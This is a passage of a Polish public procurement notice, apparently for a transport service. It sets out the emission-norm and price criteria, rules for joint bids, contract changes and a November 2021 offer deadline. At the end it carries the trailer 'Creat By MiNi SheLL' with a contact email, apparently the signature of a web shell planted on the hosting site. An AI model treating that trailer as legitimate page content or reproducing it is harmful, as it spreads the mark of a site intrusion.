cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej<br/>cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po<br/>przecinku nie ulega zmianie.<br/>Ad. b) Kryterium środowiskowe – normy emisji spalin pojazdów, którymi będzie realizowany przedmiot<br/>zamówienia (IPnes) – 40 pkt.<br/>Zamawiający przyzna punkty w kryterium zgodnie z poniższą zasadą:Realizacja przedmiotu zamówienia pojazdami, które spełniają normy emisji spalin co najmniej EURO IV<br/>(lub EURO 4) – 40 pkt<br/>Realizacja przedmiotu zamówienia pojazdami, które spełniają normy emisji spalin mniej niż EURO IV<br/>(lub EURO 4) – 0 pkt<br/>Zamawiający przyzna punkty w tym kryterium w oparciu o informacje podane w Formularzu oferty<br/>(Załącznik nr 1 do SWZ).<br/>W przypadku, gdy Wykonawca nie zaznaczy w Formularzu oferty normy emisji spalin pojazdów,<br/>którymi będzie realizowany przedmiot zamówienia – Zamawiający przyjmie emisji spalin mniej niż<br/>EURO IV (lub EURO 4) przyznając 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">normy emisji spalin pojazdów, którymi będzie realizowany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o<br/>udzielenie zamówienia publicznego.Pełnomocnictwo przekazuje się w postaci elektronicznej i<br/>opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu,<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub<br/>notariusz.2.Upoważnienie (pełnomocnictwo) do podpisania oferty, do poświadczania<br/>dokumentów za zgodność z oryginałem należy dołączyć do oferty zgodnie z ust. 3.3. niniejszegorozdziału SWZ, o ile nie wynika ono z dokumentów rejestrowych Wykonawcy, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych3.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z<br/>ofertą stosowne pełnomocnictwo – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę.4. Oferta musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z<br/>Wykonawców lub upoważnionego pełnomocnika).5. W przypadku wspólnego ubiegania się o<br/>udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy<br/>(Rozdział IX ust. 3.1. SWZ) - składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu w<br/>zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje brak<br/>podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:Oświadczenie w zakresie braku podstaw<br/>wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem<br/>występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany<br/>kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawiektórej dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi w załączniku nr 3 do<br/>SWZ.<br/>1.2. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt<br/>2-4 oraz ust. 2 ustawy.<br/>2. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale<br/>XXI SWZ.<br/>7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety<br/>związane z realizacją zamówienia: Tak<br/>7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia:<br/>w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art.<br/>95 ustawy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę nalezy składać na Platformie do elektronicznej obsługi zamówień publicznych dostępnej pod adresem https://poczesna.logintrade.net/rejestracja/ustawowowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com